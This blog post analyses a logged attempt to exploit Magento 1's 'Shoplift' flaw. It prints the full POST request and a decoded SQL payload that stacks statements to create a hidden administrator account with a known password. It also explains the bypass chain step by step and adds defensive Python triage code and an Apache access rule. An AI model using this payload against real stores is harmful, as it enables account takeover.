Attacker attempting a SQL injection via POST /admin/Cms_Wysiwyg/directive/index/ request

I’ve only seen this attack twice in the past six months (as far back as I keep logs). The first was on 2015-09-15 from the domain qs.biz in Russia (RU). The most recent was today, 2015-09-24, from gigaboxhosting.net in the US. This was the request:

POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1
Host: www.skepticism.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2;
Accept: */*
Content-Length: 1349
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------daadfd20bc730c50

--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="filter"

cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTM…
--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="___directive"

e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ==
--------------------------daadfd20bc730c50
Content-Disposition: form-data; name="forwarded"

1
--------------------------daadfd20bc730c50--

The ___directive value base64-decodes to

{{block type=Adminhtml/report_search_grid output=getCsvFile}}

The filter value base64-decodes to

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = \t'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , 'ganteng123') ), CONCAT(':',
@SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','039efceb0a7b17b@telekpitekwashere.cok','coadmin',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = 'coadmin'),'Firstname');

A Google search suggests that the attacker is trying to exploit a vulnerability in Magento, the e-commerce platform from Magento.com, that has already been fixed: the request matches the publicly documented “Shoplift” chain that Magento patched with SUPEE-5344 in February 2015. The pieces fit together like this. The client-supplied forwarded=1 stops Magento’s admin observer from redirecting an unauthenticated request to the login page, so the Cms_Wysiwyg directive action runs without a session. That action base64-decodes ___directive and hands it to the template filter, which instantiates the Adminhtml report search grid block and calls its getCsvFile method. Building the CSV makes the grid apply the base64-decoded filter parameter, and the value of popularity[field_expr] reaches the generated SQL without escaping. The attacker therefore closes the open parenthesis with “0);” and appends further statements, which the PDO MySQL driver Magento uses will execute in the same call. Those statements build a password hash in Magento 1’s own format (MD5 of salt plus password, followed by a colon and the salt; here the salt is “rp” and the password “ganteng123”), insert a user named coadmin into admin_user, and attach it through an admin_role row with parent_id 1 and role_type ‘U’ to the built-in Administrators role. The attacker is clearly trying to create an administrator account with a password they know in order to gain control of the site.

This attack against my server is more sophisticated than the majority of attacks I’ve seen. It is a variation of the classic SQL injection most famously illustrated by Randall Munroe in his XKCD cartoon “Exploits of a Mom”: the attacker terminates the statement the application meant to run and appends statements of their own.
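As an added example (my code, not anything from the post), the following Python script reconstructs the attacker’s request body from the decoded values above and then does what a log reviewer wants: it splits the multipart form, base64-decodes the two encoded fields, flags the indicators of this particular attack, pulls the injected username, salt and password out of the SQL, and recomputes the Magento 1 password hash so the backdoor account can be recognised by its password column. The sample body is constructed from the values shown on the page (the truncated filter field is re-encoded from its decoded form, and the stray “\t” in the decoded SQL is treated as whitespace); the regexes and function names are my own assumptions.

```python
"""Triage the Magento admin-creation SQL injection request shown in the post."""
import base64
import hashlib
import re

# Constructed sample input: the attack body from the post, rebuilt from the
# decoded values it shows (the page truncates the base64 "filter" field).
BOUNDARY = "------------------------daadfd20bc730c50"
DIRECTIVE = "{{block type=Adminhtml/report_search_grid output=getCsvFile}}"
FILTER_SQL = (
    "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);"
    "SET @SALT = 'rp';"
    "SET @PASS = CONCAT(MD5(CONCAT( @SALT , 'ganteng123') ), CONCAT(':', @SALT ));"
    "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;"
    "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,"
    "`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,"
    "`rp_token_created_at`) VALUES ('Firstname','Lastname',"
    "'039efceb0a7b17b@telekpitekwashere.cok','coadmin',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());"
    "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) "
    "VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = 'coadmin'),'Firstname');"
)


def build_body(filter_sql=FILTER_SQL, directive=DIRECTIVE, boundary=BOUNDARY):
    """Rebuild the multipart/form-data body the way the attacker's tool sends it."""
    def part(name, value):
        return f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
    return (part("filter", base64.b64encode(filter_sql.encode()).decode())
            + part("___directive", base64.b64encode(directive.encode()).decode())
            + part("forwarded", "1")
            + f"--{boundary}--\r\n").encode()


def parse_form(body, boundary):
    """Minimal multipart/form-data splitter: {field name: raw text value}."""
    fields = {}
    for chunk in body.split(("--" + boundary).encode())[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', head)
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n").decode()
    return fields


def b64_text(value):
    """Decode a base64 field, or return None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:                       # binascii.Error is a ValueError
        return None


def indicators(body, boundary=BOUNDARY):
    """List the attack indicators present in one request body."""
    fields = parse_form(body, boundary)
    found = []
    if fields.get("forwarded") == "1":
        found.append("client-supplied forwarded=1 (login-redirect bypass)")
    directive = b64_text(fields.get("___directive", ""))
    if directive and re.search(r"\{\{block\s+type=Adminhtml/\S+\s+output=getCsvFile", directive):
        found.append("___directive renders an Adminhtml grid block as CSV")
    sql = b64_text(fields.get("filter", ""))
    if sql:
        if re.search(r"field_expr\]=[^&]*\)\s*;", sql):
            found.append("field_expr closes the query and stacks statements")
        if re.search(r"INSERT\s+INTO\s+`?admin_user`?", sql, re.I):
            found.append("stacked INSERT into admin_user")
        if re.search(r"INSERT\s+INTO\s+`?admin_role`?", sql, re.I):
            found.append("stacked INSERT into admin_role")
    return found


def injected_account(sql):
    """Pull the backdoor username, password and salt out of the decoded filter SQL."""
    salt = re.search(r"SET\s+@SALT\s*=\s*'([^']*)'", sql)
    password = re.search(r"CONCAT\(\s*@SALT\s*,\s*'([^']*)'\s*\)", sql)
    # The INSERT lists firstname, lastname, email, username first, so the
    # username is the fourth quoted literal of its VALUES clause.
    user = re.search(r"INSERT\s+INTO\s+`?admin_user`?.*?VALUES\s*\(\s*(?:'[^']*'\s*,\s*){3}'([^']*)'",
                     sql, re.I | re.S)
    if not (salt and password and user):
        return None
    return {"username": user.group(1), "password": password.group(1), "salt": salt.group(1)}


def magento1_hash(password, salt):
    """Magento 1.x admin hash: md5(salt + password) + ':' + salt, what the payload's CONCAT builds."""
    return hashlib.md5((salt + password).encode()).hexdigest() + ":" + salt


def magento1_verify(password, stored):
    """Check a candidate password against a stored admin_user.password value."""
    digest, _, salt = stored.partition(":")
    return hashlib.md5((salt + password).encode()).hexdigest() == digest


if __name__ == "__main__":
    body = build_body()
    for hit in indicators(body):
        print("indicator:", hit)
    account = injected_account(b64_text(parse_form(body, BOUNDARY)["filter"]))
    print("backdoor account:", account)
    print("stored hash would be:", magento1_hash(account["password"], account["salt"]))
```

The same indicators() check can be run over any POST body captured for /admin/Cms_Wysiwyg/directive/index/, and magento1_verify() can be pointed at the password column of any admin_user row you do not recognise: if the attacker’s password verifies, the row was planted by this request.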

Published by

Kurtis Rader

I’m first and foremost a Secular Humanist and Atheist. To pay the bills I’m a software engineer. When not working I walk or play with my dogs, read lots of non-fiction (and some fiction), and watch lots of movies.

2 thoughts on “Attacker attempting a SQL injection via POST /admin/Cms_Wysiwyg/directive/index/ request”

  1. Ohhh. I am using Magento. I have the same user name; I found it on 29.8.15. Unfortunately I checked and I found it. By default it doesn’t damage anything. How to stop this nonsense?

  2. I don’t know anything about Magento.com CMS products. Having said that, the first two, very obvious, steps to take are

    1) Delete any account you do not recognize.

    2) Upgrade your installation to close the security hole the attacker is exploiting.

    I would then recommend evaluating your firewall rules. If you’re using the Apache HTTP Server you should consider using mod_rewrite rules, possibly in conjunction with virtual hosts, to only allow access to the /admin/Cms_Wysiwyg path from trusted sources (e.g., your private, internal network).
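An added example of the restriction suggested in the reply above (my configuration, not the post’s or Magento’s). It uses Apache 2.4’s Require directive inside a LocationMatch instead of mod_rewrite, and it covers the whole admin router rather than only /admin/Cms_Wysiwyg, since the same login bypass reaches every admin controller. The 10.0.0.0/8 network and the two path forms are assumptions: Magento 1 serves its admin under /index.php/admin/ by default and under /admin/ when URL rewriting is enabled, and the admin front name may have been customised.

```apache
# Added example (not from the post): allow Magento's admin router only from
# trusted addresses.  Adjust the network to your own and the path if your
# admin front name is not "admin".  Apache 2.4 syntax; on 2.2 use
# "Order deny,allow / Deny from all / Allow from ..." instead.
<LocationMatch "^/(index\.php/)?admin(/|$)">
    Require ip 10.0.0.0/8
    Require ip 127.0.0.1
</LocationMatch>
```

Requests such as the one in the post, arriving from an untrusted address, then get a 403 before Magento’s PHP code ever runs, which also closes the window between a new Magento advisory and the moment you apply its patch.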
